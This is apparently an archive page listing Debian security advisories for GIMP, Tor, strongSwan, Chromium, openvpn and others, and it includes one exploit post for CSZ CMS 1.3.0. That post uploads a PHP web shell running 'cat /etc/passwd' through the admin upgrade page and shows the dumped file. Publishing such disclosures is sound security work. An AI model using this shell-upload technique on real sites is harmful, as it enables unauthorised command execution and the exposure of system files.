Debian Linux Security Advisory 5564-1 - Michael Randrianantenaina reported several vulnerabilities in GIMP, the GNU Image Manipulation Program, which could result in denial of service (application crash) or potentially the execution of arbitrary code if malformed DDS, PSD and PSP files are opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5564-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 24, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gimpCVE ID         : CVE-2023-44441 CVE-2023-44442 CVE-2023-44443 CVE-2023-44444Debian Bug     : 1055984Michael Randrianantenaina reported several vulnerabilities in GIMP, theGNU Image Manipulation Program, which could result in denial of service(application crash) or potentially the execution of arbitrary code ifmalformed DDS, PSD and PSP files are opened.For the oldstable distribution (bullseye), these problems have been fixedin version 2.10.22-4+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 2.10.34-1+deb12u1.We recommend that you upgrade your gimp packages.For the detailed security status of gimp please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gimpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVhJD5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0R/hxAAlMYQg+W/jKy/+bgIgisVlRM1dSij6pPFqqCh0aMZr9j8AX8CpZvJBCiRmlfPZe6qS88LKt70zX5xoJOFQ5XS/b9HTMFrv2V6l3pe83Hag0sJOic4WbmI258iB6DFb3qVA9PZjQ+a7JsoPBVc80M3o+rkFbdn2e/d+6ApLxq0XGb3iH0JkYIny41F3FLYhFI1iRCbX9Oxhe91MmtM2CvI5/UWjALS9+U3IgnuyfnTLUEkCfMnvTLEiMBBTwt/rD+zhOEFMvQazocoqEDDjmo4aJ4CVC78EJYbfthUH55JVordifVS6u0tQM0wXGPJhQPsDIModp0KoukvUVlj/LLKa2q9xr5IAM7G5IM3vah8yAFAiF5BFEE4nIRtBBlwfPPVJjrnZEd+pb02HaKgD7bdmAC775HtX8ExGmMeg54ckXv3gokUbFIzDXBAKXhWjoNztrrRiWIo08knZCIYPTxe0Ou6XvrYxcD0UufxqXkSsCdYzC+aBIJasfpdXpbUZ6ECwK/A7DmaIj7Ar4ssvQKf0uLGmQDzGZiLpNsgXg4tR04xCBwQIU7ONr5b629hDt0Lo6QCjNsSlWKNdOkiIZ3DIYRGUEq4dL56pa+vz74nhvEYq2pWu5ijCAk7XOZWuw/CkcMpeXp4Y5yZ88eUYdM3bvpCgriqXvpWJA1NxAiw0/sêEb-----END PGP SIGNATURE-----

Debian Security Advisory 5564-1

Debian Linux Security Advisory 5563-1 - Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, Alyssa Milburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi, Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela, Doug Kwan, and Kostik Shtoyk discovered that some Intel processors mishandle repeated sequences of instructions leading to unexpected behavior, which may result in privilege escalation, information disclosure or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5563-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : intel-microcodeCVE ID         : CVE-2023-23583Debian Bug     : 1055962Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, AlyssaMilburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi,Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela,Doug Kwan, and Kostik Shtoyk discovered that some Intel processorsmishandle repeated sequences of instructions leading to unexpectedbehavior, which may result in privilege escalation, informationdisclosure or denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 3.20231114.1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 3.20231114.1~deb12u1.We recommend that you upgrade your intel-microcode packages.For the detailed security status of intel-microcode please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/intel-microcodeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVfcuFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SRaw/+JwZlE+c2OdKBuLSQCrlASs1iM+iDrbEYKWU/F+RX5HZgB7O5d953MSnC3jIE0+93CY0oW6iwc3ZTaY4cVt7bVC5MmAzkhcVuxLFNqHoBMUtiqIFX4TguWokALnuXQRrs6+DyZ+3C0gcvHtINnEJzlhS8Oqb0xyJQqSlpYiNng7Wa/F8rfLYGWh6ZN+KIYlyVRBfSO+9pMhRFCM29DWdakdgC5KfHNtRENZxpgeGRxCQQuJIs30hIqKc2Zma3AcSDU3hiHYSXTD7GjMxD5MYkV0U3ervXgcsfpmbW0rczOOK49VZHdQC2frYPEYnFGSMwl72adEtdKctocqRSjtnAbCanEY8Ses7ihTB5l9H7u4TXgzJrHnZSiZ0LXd08AJ8m5zglYg9t4UF3qRYgbdRdAvcOpqggAsZVT5UJWVTVP1rAXhyWGXqh39k9/+JAwjJUTVBIkgJMWPWvj9vLeR7fNKNkJPRfi6wRVZ+cWf5Z2/VqHRkjgT4pDImyadFzRFFzy2JLLett0wpF7Elkpb/0RFOmZw0GbBIOM3XU+/OD93TcT0o0i4gU7DHiW/tEOUk7tnGcIAz3/h9yaOVObm36RdiAHZ+Mprk/GpiSLBsfBQueo+gra2vo0qcqpEgA2XiHqT1LQeqcfJ5AXvdBZAL4bxeWx6DteLL6k1OLrvg4qUc=l9kq-----END PGP SIGNATURE-----

Debian Security Advisory 5563-1

Debian Linux Security Advisory 5562-1 - It was discovered that Tor was susceptible to a crash during handshake with a remote relay, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5562-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 22, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : torCVE ID         : not yet availableIt was discovered that Tor was susceptible to a crash during handshakewith a remote relay, resulting in denial of service.For the oldstable distribution (bullseye), support for tor is nowdiscontinued. Please upgrade to the stable release (bullseye) to continuereceiving tor updates.For the stable distribution (bookworm), this problem has been fixed inversion 0.4.7.16-1.We recommend that you upgrade your tor packages.For the detailed security status of tor please refer toits security tracker page at:https://security-tracker.debian.org/tracker/torFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVeVPMACgkQEMKTtsN8TjbMIA/9EhW1HGw07Hn4iLfT369mukHIEN8TNTS1hGwRKJAf0yZFnqdqdKJ7EsBINIh8LlaHxq09JmMN92oMSvenMMrmpCYCRL2UicPTO59ChueUmIH9gLgr1EqWly2b/A09bfCc3TXA35XDzdFWHuI6k6BV6YVQXfeJP4Xxqg+wrYoXSKq1urhtCIT8+11mmylwKsE0uaIAatMhpLRDPCc4yp0brQTklup+bn7GMpgQbbyuPHazJMYmU7qgRh2u9KPa7XMTt1mpx/b55TRQ2EatVwpHukY131putTfV195i96yD/wECZ9R/ey/maF17EGDq+FtnTus1ePuZmV5eVAZRe1+4wOlUoUggVysJUsor6CYIJ0gTwdozXRzFfR4nkfF+odUBhJAivLvPi9UB0iLo3o3c0l83l0tHRsCVC3TtBo1svo8Q4Ri9p8U1ajmKh8AaNHzGgxwdmot5vbTkyO/Hy4tR7Z3PTWne2OsiL0NcQdQZ1/Cxbcr0h3BFF0fkYtQhG4pMa7luQxQC4GSAVQqKqB4IR4RnSHflCpQcbNm3g9UyYv6G4m6RmVfRuSlaG04TOz3MkLqzdn3iKLsyMbQw2Ojq6CWRUYa4QazjIb6owFjQnarUGKDxlnKtJW2W4IJVCi0Wgt2HwmgCtXjOEqtyhdPhlCGNEViocseong99Mz0Sm6E==H3jh-----END PGP SIGNATURE-----

Debian Security Advisory 5562-1

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

Debian Linux Security Advisory 5560-1 - Florian Picca reported a bug the charon-tkm daemon in strongSwan an IKE/IPsec suite.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- --------------------------------------------------------------------------  
Debian Security Advisory DSA-5560-1                   security@debian.org  
https://www.debian.org/security/                        Yves-Alexis Perez  
November 20, 2023                     https://www.debian.org/security/faq  
- --------------------------------------------------------------------------

Package        : strongswan  
CVE ID         : CVE-2023-41913

Florian Picca reported a bug the charon-tkm daemon in strongSwan an IKE/IPsec  
suite.

The TKM-backed version of the charon IKE daemon (charon-tkm) doesn't  
check the length of received Diffie-Hellman public values before copying  
them to a fixed-size buffer on the stack, causing a buffer overflow that  
could potentially be exploited for remote code execution by sending a  
specially crafted and unauthenticated IKE_SA_INIT message.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.9.1-1+deb11u4.

For the stable distribution (bookworm), this problem has been fixed in  
version 5.9.8-5+deb12u1.

We recommend that you upgrade your strongswan packages.

For the detailed security status of strongswan please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/strongswan

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVbyg9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QjhA//dfNonaZKJnldK6N+2CkHz6Z8JUwTGIugk57QdFc3MJcH+tjreZZmB6VJ  
aGJK4726bt6/1hh6N2AnQUy7jSxi/3h6FI2om4jK9QdAx/zyMQOXAmXt4Aexzm75  
Pz7/ldiG7/ZAxIS8ua1GA6GTOFdQllJ5P4HdBunO5VL9m0Jd9qGZkVOVMkTu7l/j  
NyZgQ3RZyiqWbH1iFEvTjw6N/FrSXRr+GeHWsebdx/xNEXhKS7Hjwbw7ROZEXRno  
+ZRDtUrBe+QNpMx7BE+mmOF3eIZtmlgxHlR4AKtVITKAuEdkQqxminhaaZse9nOX  
u8sju25jJ82WUItkdNSCVqeAjlT/+ru2NoE3ZFpRs6LpRxalvMmXA6R5Eh4agoOG  
OpAWFt8yq0q8Ba347zm+1WCNOr30ZJRLJ8IcOlyShOJv2v5wqMg2VedwgEXOPftZ  
5+vSDN+gHYr5KWS7KFxDx57Tsl6PORdla4rNie3CpEVr4aQnVnKp2mJsuPn6Ax3g  
Sxbh4YDGXBLA5tgKrM0kJsaFPFLk2h4UtA8nLg91HoaxIFsDyO1kdR6uIVBNpJed  
CsYSe9F++jqSlZl4XMKXuxDTjtNoXLm9OTsvkezhN2vTWtLYeHVY5++ckL6guSpK  
dC9Sd7F+SIp3O+XYilsggqMaBJCKUA8l2LJtuWls5skMUvAN4C8=  
=xq5Y  
-----END PGP SIGNATURE-----

Debian Security Advisory 5560-1

Debian Linux Security Advisory 5559-1 - A vulnerability was discovered in the SSH dissector of Wireshark, a network protocol analyzer, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5559-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 19, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wiresharkCVE ID         : CVE-2023-6174 CVE-2023-6175A vulnerability was discovered in the SSH dissector of Wireshark, anetwork protocol analyzer, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 4.0.11-1~deb12u1.We recommend that you upgrade your wireshark packages.For the detailed security status of wireshark please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wiresharkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVaYm8ACgkQEMKTtsN8Tjbp5A//TSNrnxYrdW4XklOocknIwdtDtzt3AcXA6MLRlWmXnR9I3JWAnfWG84ezlXM/p3kLRN2bzfYVqhL2MpCNQzDyrTpx+0GWSImkPy520WlIrC64GHOqffIffDeF+28bQfdhbI13Kcfc9F7/PLIA9VvzqoFPHlCVdJhxvaCCJHBN2HefNC4fnEKlpU+ZI/68nzvzZsJG5K3tcdUp9BDYr8eRqmfWwuIteTBqfZ13ohvU8lYK6TNZah+NiGoSUmLGtf/5QMXeytiIVDkul5+b206ckvotm2EZQXtZntjZijPbLI1Fh8rPAuVDEbmBQOwYYc7OKlNDKl3GM2bnMXbJaNDBJ2YJk2hO5OfTankrnY54LX7R3D0WBhsDRb7X4tx9shgWOm23aigUj0ebR5jVmaDMYAOMEr5U9juPa8LBRu9gQWRbuuwADTcjsGQiYhjqKoGrCErSInuQUyNSgmyBQgeA4uQipSLpQozt42u2CfBJb5te+sI/USF9xK6xusF5BZK+5leinGLQyDd/wMn8gx/UzbDcvjuT3XMek+1fJjVfzLehorwt+Ck4yXc9edKRFS86ZRVSchFVmZUFREGszNQAwWUbtlXfeLBIF8yNqp7E9qTMyjBpCplk/Vnb3va6wJhMCYTUAgBYVjQ2P6tCPyQJHB8HrXgexcBluGBuu1q2b4M==sLQ/-----END PGP SIGNATURE-----

Debian Security Advisory 5559-1

Debian Linux Security Advisory 5558-1 - Two security vulnerabilities have been discovered in Netty, a Java NIO client/server socket framework.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5558-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : netty  
CVE ID         : CVE-2023-34462 CVE-2023-44487  
Debian Bug     : 1038947 1054234

Two security vulnerabilities have been discovered in Netty, a Java NIO  
client/server socket framework.

CVE-2023-34462

    It might be possible for a remote peer to send a client hello packet during  
    a TLS handshake which lead the server to buffer up to 16 MB of data per  
    connection. This could lead to a OutOfMemoryError and so result in a denial  
    of service.

CVE-2023-44487

    The HTTP/2 protocol allowed a denial of service (server resource  
    consumption) because request cancellation can reset many streams quickly.  
    This problem is also known as Rapid Reset Attack.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:4.1.48-4+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:4.1.48-7+deb12u1.

We recommend that you upgrade your netty packages.

For the detailed security status of netty please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/netty

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmVY5TZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRHiBAAzFhW85Ho37J02wrSDVwhIMTsVjNO9lnA08Pswdohr9K1wxeCJ/hBAx97  
UNIrjTxyOfCJWi1Kj5pITXEHBRu6w1fj/5y9yoMpAKEu+oGQroHbSf4CPmqP2Of0  
eamkfbGx2Dh7Ug3qYxe+elcqRtU3gu8I8DYcWJnm2VpWq7/pbNJ+9iqtmMjhkPLH  
1etLI/5HAkwpPimZSrHzcimn39gEVaIbZLc86ZBAoAPghc+iJR1JFHERmkEutWkB  
eAnL3kD1mr6F711eZvDfPaRfEUVorW67ZEpPX68MJExuYHNXd268EhQOhf/ZYv8g  
SUSBJuKw4w2OnL4fn8lhqnQgYHUVkcYBtfYii6E9bEVAIPoaT+4gvdSg9zkF6cza  
Da8SXkEY2ysaX+A24iVnCNMpCMSOUOxWsFFvkCcfi8A4HxGGqWzVOsBbDJKjktS1  
g6FyeqWsGh9QG/CPYeMN7LB7lW1l2XzO6GQ9QR1rzU/whgUVxprkye5wx2BaQmom  
rrWVHBijH1cNWd1IbryAm+prduL1l/CNR0785ZPTjB3SsMFPCAtRHf9G976rqVs0  
P3jGg+BdeDj+sd3EFHcHnNXQOaETgR07RWzngbjEkgmJYhB2B43hCQ2LwsNlHsmg  
O6otUI2k274IF9KHh0T1h1hopbUTU8VPy3dpcLloCzk7KiAv1RI=  
=4ExT  
-----END PGP SIGNATURE-----

Debian Security Advisory 5558-1

Debian Linux Security Advisory 5557-1 - WebKitGTK has vulnerabilities. Junsung Lee discovered that processing web content may lead to a denial-of-service. An anonymous researcher discovered that processing web content may lead to arbitrary code execution.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5557-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
November 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-41983 CVE-2023-42852

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-41983

    Junsung Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2023-42852

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.2-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.2-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmVWsEgACgkQAAyEYu0C  
2ALSaxAAlUplCgENdVCJvbf2cRhZiJeQvEm71xLR972uesvSaBr+NsQacz+lv6qU  
3U8iq4ulY8Y4o8rv3TbIrxF+WvMWYq8U7a8vqrY66W++u4//L5INYvuIxaNwoonV  
+r30K0tJ2exsbTdQVCSHe2dB8aOf1qLWJHpwgnYuSIZRS1rBxSrxTUuJizZsUXi5  
Y4l4KRdGIuv/e+kIkxKDCxeFHI3bmHJEZiDnNG8ohVSxmWPqjNFh9ZBYcFynVoFr  
hrqc076Py5ok4AYLgnH2rW8/33NCsh08IINqRovR6cSkOLL9KZFSeKWAKZunbrjb  
Ptp3wZSANh5pYBl7cbxXvam+gakgkkZg9hNoe+RJjRBwEUylURODK6+dBNXbO1mr  
JQqajMyXnUWT8JakalV0Ioi6KKQR6Qpp7OGTdoLlrnh1oXAjrbDTtwk6Zn2LEWwr  
THCH4roBbVKPXG0LJRGntWnt/qRVMjnmmCY1xOzs/Y+5tuR0ChtlZueGrL1t9kSQ  
EVMU7MZ3jBz0l0ZkzWFMXzSNXQK6m0Vef1vS9JZkNyc+sBmtrDQfJu+qf17z1RUz  
56FuYfVi4f+P+IxyLnh5MTssR8QjLR1WCVZBiTyfIyNtl6oOCFJ9UTrQC8QnycD6  
tHJfHHwwAp5HucG6zaJHZ3KV4BOuL6bNV0SChvlCc13dnTyyGv4=  
=zn+t  
-----END PGP SIGNATURE-----

Debian Security Advisory 5557-1

Debian Linux Security Advisory 5556-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5556-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 15, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5997 CVE-2023-6112Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 119.0.6045.159-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 119.0.6045.159-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVVT/UACgkQZF0CR8NudjfQZw//bJoI/QaSlCksKVM/OBj1flTAddPBNLyLxnxhIgRFk8hAWKXZfncSMt7PRfnkbzEHMxWjPmCFf3G1MnpHxI8TEMD9Ry8mmTQ/ZwZd04JYUQ6bGHKmCh6EwT/ipFpw76Xaym/CfCsrSVa+z7VclQ+S8KumbGknuJN87H0SyxwaP2khP/T/c9v1IY2qq5tJLYOAKMN+Sadex9U3+kjHScx3bBBD8OJ/PGV16X+NxctQ0bdQPVfTlXbmkiQhMnp8c4bxkgNNFV0W1AlYzUWPcIyDgJjcuR0lowEUGkT0awq23HavlA50abiUYDVP15RBkY75c0eyB4/UgP71UjUHvm23ztcaozNl0/YIUVvqMF47toydCEkrUzv6jRBCQVkAeMd3y1CQMYu/CF0U7uwrElelAVxVo0Al24G1fbjAdS5xTHe8TOJg1s5e0uts38kUzT0ESj8a0D3swjnt8AHkrJQN6bN4x9PinZPTQN9gLKdbw9vDaWOhAx3VWdfl2Pscscu+18B3GbCWtZE904rPyb6vRrHYTtCHMSzxPCrvKVSjoI28zawXhJY+eDY6Tepm6ewP2AG3oRc9/8RhBDaEnUAz+Dd4GyTTv260a2N5xnZyfuiIRv/DR0M1jhzTuJQokpfxzXQwxvgS9oMwW9WAZWJWfug7nPKuSruHbLzKlHheqKI==eZ05-----END PGP SIGNATURE-----

Debian Security Advisory 5556-1

Debian Linux Security Advisory 5555-1 - Two vulnerabilities were discovered in openvpn, a virtual private network application which could result in memory disclosure or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5555-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 15, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openvpn  
CVE ID         : CVE-2023-46849 CVE-2023-46850

Two vulnerabilities were discovered in openvpn, a virtual private  
network application which could result in memory disclosure or denial  
of service.

   The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.6.3-1+deb12u2.

We recommend that you upgrade your openvpn packages.

For the detailed security status of openvpn please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openvpn

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVVGAAACgkQEMKTtsN8  
TjZneg//bSgv5wdYUyFUWMI0hIYO/uV7bSCpUoJa6RG7BlPQ5zihVq6kw5MA+Dq2  
psZYDGcQZwM7Dne+bYChAFBL7+QrXLANLrZVHKyOeA5gRpDvlquGNR4D3ZloMVIt  
xdWpmHPAutHdWdTifZ390toJCWKKZTPRvxrohiirHVIQH03VYCFCupJYyZTFMOes  
vfz1t6wPoiAGlPvAkMXBHzCPAkRjOcz6S01V/dQPQbvo6oW9MNHCT+Upfj0M74rV  
Z9v8fpbnXzonoNoIDm7YQud+fIEDIr63m2kB0M31qO8jdWsvLrBgtseX6VO5Ni03  
UBeDAPTId8foPomxvhvl/8jcoMF/u3N3tivR2n9pV3vZKN1c08cH2vYnlal2Q9i+  
